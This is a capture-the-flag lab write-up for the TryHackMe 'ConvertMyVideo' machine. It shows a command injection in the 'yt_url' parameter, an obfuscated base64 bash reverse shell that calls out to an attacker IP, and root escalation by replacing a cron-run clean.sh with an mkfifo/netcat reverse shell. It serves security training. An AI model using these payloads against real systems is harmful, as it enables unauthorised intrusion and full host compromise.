> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/convertmyvideo.md).

# ConvertMyVideo

## Nmap

```
sudo nmap 10.10.50.86 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelP
```

Port 80 lands us on a Youtube video conversion page.

![](/files/-MXE9-_RsS5zykNwM_Gk)

Running feroxbuster against the target website produces only a few results. Of which only the /admin directory is interesting. The /admin directory uses a HTTP-basic-form and I was unable to crack using rockyou.txt with common user names such as 'admin'.

![](/files/-MXE9QG0aCY1aE3I2stD)

Running a generic query does not produces anything interesting.

![](/files/-MXE9ijHbPS56gLEN0gQ)

Running the search query through Burpsuite gives us the parameter 'yt\_url'.

![](/files/-MXEA8rl1LUxrb4DZg_i)

Referring against this link we can try various command injection techniques for valid parameters.

{% embed url="<https://book.hacktricks.xyz/pentesting-web/command-injection>" %}

As per the link trying the following gives us a command injection result:

```
yt_url=ls||id;
```

![](/files/-MXEB0KRrJi_3SCeSM7z)

Knowing we can inject commands we can attempt a reverse shell by running the command below in a terminal on our attacking machine then taking the output and using it in our command injection

```
echo "echo $(echo 'bash -i >& /dev/tcp/10.14.3.108/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
```

![](/files/-MXEBT0PtdRp5GR0aOnN)

Then paste the output into Burpsuite:

![](/files/-MXEBdo0MxVsIJRfXTqI)

Once sent we should receive a reverse shell on the `netcat` listener.

![](/files/-MXEBrYsl3Wn_jKepXuF)

After looking about the machine and running enumeration scripts I was unable to identify any points of escalation. I then decided to run [pspy64](https://github.com/DominicBreuker/pspy/releases) to see if anything is being executed on a regular basis.

After transferring and running we get the following results:

![](/files/-MXENqc8FbKaBjNrHhcu)

Frequently the following is being run:

`/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/clean.sh`

From here I echo'd out the contents of clean.sh and replaced the contents with a `netcat` reverse shell.

```
echo  > clean.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.3.108 4444 >/tmp/f' > clean.sh
```

Then set up a listener on port 4444 waited a few seconds and received a shell as root.

![](/files/-MXEQS2X_aUR4KX_Sxv1)
